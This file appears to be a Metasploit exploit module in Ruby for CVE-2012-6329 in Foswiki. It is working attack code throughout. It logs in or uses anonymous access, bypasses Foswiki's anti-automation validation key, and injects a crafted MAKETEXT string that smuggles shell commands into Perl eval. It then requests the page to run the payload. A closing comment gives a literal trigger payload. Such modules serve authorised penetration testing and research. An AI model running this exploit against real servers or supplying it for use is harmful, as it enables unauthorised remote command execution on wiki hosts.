Ruby | 237 lines | 180 code | 41 blank | 16 comment | 27 complexity | 79868104be54d304103359465aa67783 MD5 | raw file
- ##
- # This module requires Metasploit: http://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Foswiki MAKETEXT Remote Command Execution',
- 'Description' => %q{
- This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using
- a specially crafted MAKETEXT, a malicious user can execute shell commands since the
- input is passed to the Perl "eval" command without first being sanitized. The
- problem is caused by an underlying security issue in the CPAN:Locale::Maketext
- module. Only Foswiki sites that have user interface localization enabled
- (UserInterfaceInternationalisation variable set) are vulnerable.
- If USERNAME and PASSWORD aren't provided, anonymous access will be tried.
- Also, if the FoswikiPage option isn't provided, the module will try to create a
- random page on the SandBox space. The modules has been tested successfully on
- Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.
- },
- 'Author' =>
- [
- 'Brian Carlson', # original discovery in Perl Locale::Maketext
- 'juan vazquez' # Metasploit module
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'CVE', '2012-6329' ],
- [ 'OSVDB', '88410' ],
- [ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ]
- ],
- 'Privileged' => false, # web server context
- 'Payload' =>
- {
- 'DisableNops' => true,
- 'Space' => 1024,
- 'Compat' =>
- {
- 'PayloadType' => 'cmd',
- 'RequiredCmd' => 'generic ruby python telnet'
- }
- },
- 'Platform' => [ 'unix' ],
- 'Arch' => ARCH_CMD,
- 'Targets' => [[ 'Foswiki 1.1.5', { }]],
- 'DisclosureDate' => 'Dec 03 2012',
- 'DefaultTarget' => 0))
- register_options(
- [
- OptString.new('TARGETURI', [ true, "Foswiki base path", "/" ]),
- OptString.new('FoswikiPage', [ false, "Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
- OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),
- OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])
- ], self.class)
- end
- def do_login(username, password)
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => "#{@base}bin/login",
- 'vars_post' =>
- {
- 'username' => username,
- 'password' => password
- }
- })
- if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/
- vprint_status "#{res.code}\n#{res.body}"
- return nil
- end
- session = $1
- return session
- end
- def inject_code(session, code)
- vprint_status("Retrieving the validation_key...")
- res = send_request_cgi({
- 'uri' => "#{@base}bin/edit#{@page}",
- 'cookie' => "FOSWIKISID=#{session}"
- })
- if not res or res.code != 200 or res.body !~ /name='validation_key' value='\?([0-9a-f]*)'/
- vprint_error("Error retrieving the validation_key")
- return nil
- end
- validation_key = $1
- vprint_good("validation_key found: #{validation_key}")
- if session.empty?
- if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/
- session = $1
- else
- vprint_error("Error using anonymous access")
- return nil
- end
- end
- if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/
- strike_one = $1
- else
- vprint_error("Error getting the FOSWIKISTRIKEONE value")
- return nil
- end
- # Transforming validation_key in order to bypass foswiki antiautomation
- validation_key = Rex::Text.md5(validation_key + strike_one)
- vprint_status("Transformed validation key: #{validation_key}")
- vprint_status("Injecting the payload...")
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => "#{@base}bin/save#{@page}",
- 'cookie' => "FOSWIKISID=#{session}",
- 'vars_post' =>
- {
- 'validation_key' => validation_key,
- 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
- }
- })
- if not res or res.code != 302 or res.headers['Location'] !~ /bin\/view#{@page}/
- print_warning("Error injecting the payload")
- print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
- return nil
- end
- location = URI(res.headers['Location']).path
- print_good("Payload injected on #{location}")
- return location
- end
- def check
- @base = target_uri.path
- @base << '/' if @base[-1, 1] != '/'
- res = send_request_cgi({
- 'uri' => "#{@base}System/WebHome"
- })
- if not res or res.code != 200
- return Exploit::CheckCode::Unknown
- end
- if res.body =~ /This site is running Foswiki version.*Foswiki-(\d\.\d\.\d)/
- version = $1
- print_status("Version found: #{version}")
- if version <= "1.1.6"
- return Exploit::CheckCode::Appears
- else
- return Exploit::CheckCode::Detected
- end
- end
- return Exploit::CheckCode::Safe
- end
- def exploit
- # Init variables
- @page = ''
- if datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty?
- @page << '/' if datastore['FoswikiPage'][0] != '/'
- @page << datastore['FoswikiPage']
- else
- @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"
- end
- @base = target_uri.path
- @base << '/' if @base[-1, 1] != '/'
- # Login if needed
- if (datastore['USERNAME'] and
- not datastore['USERNAME'].empty? and
- datastore['PASSWORD'] and
- not datastore['PASSWORD'].empty?)
- print_status("Trying login to get session ID...")
- session = do_login(datastore['USERNAME'], datastore['PASSWORD'])
- else
- print_status("Using anonymous access...")
- session = ""
- end
- if not session
- fail_with(Failure::Unknown, "Error getting a session ID")
- end
- # Inject payload
- print_status("Trying to inject the payload on #{@page}...")
- res = inject_code(session, payload.encoded)
- if not res or res !~ /#{@page}/
- fail_with(Failure::Unknown, "Error injecting the payload")
- end
- # Execute payload
- print_status("Executing the payload through #{@page}...")
- res = send_request_cgi({
- 'uri' => "#{@base}#{@page}",
- 'cookie' => "FOSWIKISID=#{session}"
- })
- if not res or res.code != 200 or res.body !~ /HASH/
- print_status("#{res.code}\n#{res.body}")
- fail_with(Failure::Unknown, "Error executing the payload")
- end
- print_good("Exploitation was successful")
- end
- end
- =begin
- * Trigger:
- %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%
- =end